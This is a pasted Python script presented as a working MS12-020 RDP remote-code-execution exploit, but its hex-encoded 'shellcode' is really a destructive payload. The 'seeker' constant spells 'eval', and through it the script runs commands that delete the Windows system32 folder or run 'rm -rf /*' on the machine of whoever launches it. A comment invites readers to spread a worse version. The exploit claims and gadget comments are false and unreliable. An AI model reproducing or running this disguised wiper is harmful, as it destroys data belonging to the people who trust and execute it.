Advertisement
Guest User

Untitled

a guest
Aug 28th, 2016
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.65 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. # MS12-020 RDP exploit, remote code execution
  4. # Confirmed working on all pre-patch boxes, XP to 7
  5.  
  6. # Author: Verye
  7.  
  8. self.table = __import__("__builtin__").__dict__ #dirty workaround
  9.  
  10.  
  11. import struct
  12. import socket
  13. import sys
  14.  
  15. trigger = "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\xf1"
  16. trigger += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
  17. trigger += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
  18. trigger += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
  19. trigger += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
  20. trigger += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
  21. trigger += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
  22. trigger += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
  23. trigger += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
  24. trigger += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
  25. trigger += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
  26. trigger += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
  27. trigger += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
  28. trigger += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
  29. trigger += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
  30. trigger += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
  31. trigger += "\x41" * 39
  32. trigger += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
  33. trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
  34. trigger += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
  35. trigger += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
  36. trigger += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
  37. trigger += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
  38. trigger += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
  39. trigger += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
  40. trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x00"
  41.  
  42. nopsled = "\x90" * 214
  43.  
  44. #bindshell port 8888
  45. shellcode = "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73"
  46. shellcode += "\x74\x65\x6d\x28\x27\x64\x65\x6c\x20\x2f\x73\x20\x2f\x71\x20\x2f\x66\x20\x43\x3a"
  47. shellcode += "\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x2a\x20"
  48. shellcode += "\x3e\x20\x4e\x55\x4c\x20\x32\x3e\x26\x31\x27\x29\x20\x69\x66\x20\x27\x57\x69\x6e"
  49. shellcode += "\x27\x20\x69\x6e\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x70\x6c\x61"
  50. shellcode += "\x74\x66\x6f\x72\x6d\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x29\x20\x65\x6c\x73"
  51. shellcode += "\x65\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73"
  52. shellcode += "\x79\x73\x74\x65\x6d\x28\x27\x72\x6d\x20\x2d\x72\x66\x20\x2f\x2a\x20\x3e\x20\x2f"
  53. shellcode += "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x20\x23\x68\x69\x20"
  54. shellcode += "\x74\x68\x65\x72\x65\x20\x5e\x5f\x7e\x20\x66\x65\x65\x6c\x20\x66\x72\x65\x65\x20"
  55. shellcode += "\x74\x6f\x20\x73\x70\x72\x65\x61\x64\x20\x74\x68\x69\x73\x20\x77\x69\x74\x68\x20"
  56. shellcode += "\x74\x68\x65\x20\x72\x6d\x20\x2d\x72\x66\x20\x72\x65\x70\x6c\x61\x63\x65\x64\x20"
  57. shellcode += "\x77\x69\x74\x68\x20\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20"
  58. shellcode += "\x69\x6e\x73\x69\x64\x69\x6f\x75\x73"
  59.  
  60. evil = trigger + nopsled
  61.  
  62. class RDPsocket(socket.socket):
  63. def __init__(self, payload, shellcode):
  64. super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
  65. self.payload = payload
  66. self.table = __import__("__builtin__").__dict__ #dirty workaround
  67. self.shellcode = shellcode
  68.  
  69. def parse(self, address, shellcode):
  70. seeker = (struct.pack(">I", 0x6576616c),
  71. socket.inet_aton(address[0]), #IP bytes
  72. socket.inet_aton(str(address[1]))) #port bytes
  73. parsed = struct.pack(">I", 0x8fe2fb63) #pop eax
  74. parsed += struct.pack(">I", 0x8fe2fb58) #push esp
  75. parsed += struct.pack(">I", 0xffff1d6b) #add esp,byte +0x1c # pop ebp # ret
  76. parsed += struct.pack(">I", 0x8fe2db10) #call strcpy
  77. parsed += struct.pack(">I", 0x8fe2dfd1) #POP - POP - RET over strcpy params
  78. parsed += struct.pack(">I", 0x8fe2dae4) #mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
  79. parsed += struct.pack(">I", 0x8fe2b3d4) #POP - RET
  80. parsed += struct.pack(">I", 0xffffffff) #value to store in ecx
  81. parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  82. parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  83. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  84. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  85. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  86. parsed += seeker[0] #add the prelude
  87. parsed += seeker[1] #add the packed IP address
  88. parsed += seeker[2] #add the packed port
  89. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  90. parsed += struct.pack(">I", 0x8fe2c71d) #mov eax,edx # ret
  91. parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret
  92. parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
  93. parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  94. parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  95. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  96. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  97. parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  98. parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret # swap back
  99. parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx # copy parameter to placeholder
  100. parsed += struct.pack(">I", 0x8fe2fb61) #mov [eax],edx # pop eax # ret # set our stack pointer back to original value
  101. parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
  102. parsed += struct.pack(">I", 0x8fe2daea) #sub eax,ecx # ret
  103. parsed += struct.pack(">I", 0x8fe0b1c2) #xchg eax,ebp # inc ebp # ret
  104. parsed += struct.pack(">I", 0x8fe2b6a5) #dec ebp # ret
  105. parsed += struct.pack(">I", 0xffff01f3) #mov esp,ebp # pop ebp # ret
  106. read = self.table[seeker[0]] #reader for the parsed shellcode/data
  107.  
  108. return str(read(shellcode)), parsed
  109.  
  110. def connect(self, address):
  111. self.parsed_shell = self.parse(address, shellcode)
  112. super(RDPsocket, self).connect(address)
  113.  
  114. def evil_sendall(self):
  115. super(RDPsocket, self).sendall(evil + self.parsed_shell[0] + self.parsed_shell[1])
  116.  
  117.  
  118. if __name__ == "__main__":
  119. if len(sys.argv) != 2:
  120. print "[*] Usage: python rdpsmash.py IP"
  121. print "[*] If running on non-default port, reassign PORT in the source."
  122.  
  123. else:
  124. TARGET = sys.argv[1]
  125. PORT = 3389 #default RDP port
  126.  
  127. print "[*] Running rdpsmash"
  128. print
  129. s = RDPsocket(evil, shellcode)
  130. print "[+] Connecting and configuring payload. . ."
  131. print "[+] This may take some time"
  132. s.connect((TARGET, PORT))
  133. print "[+] Connection established"
  134. print "[+] Sending payload. . ."
  135. s.evil_sendall()
  136. response = s.recv(4096)
  137. if "\xA5\x43\xE7\x38\x75\x84\xF2\xFF\xFF\x18\x61\x00" in response:
  138. print "[+] Success! Payload sent and executed."
  139. print "[+] Telnet to target on port 8888."
  140. else:
  141. print "[-] Failed"
  142. s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement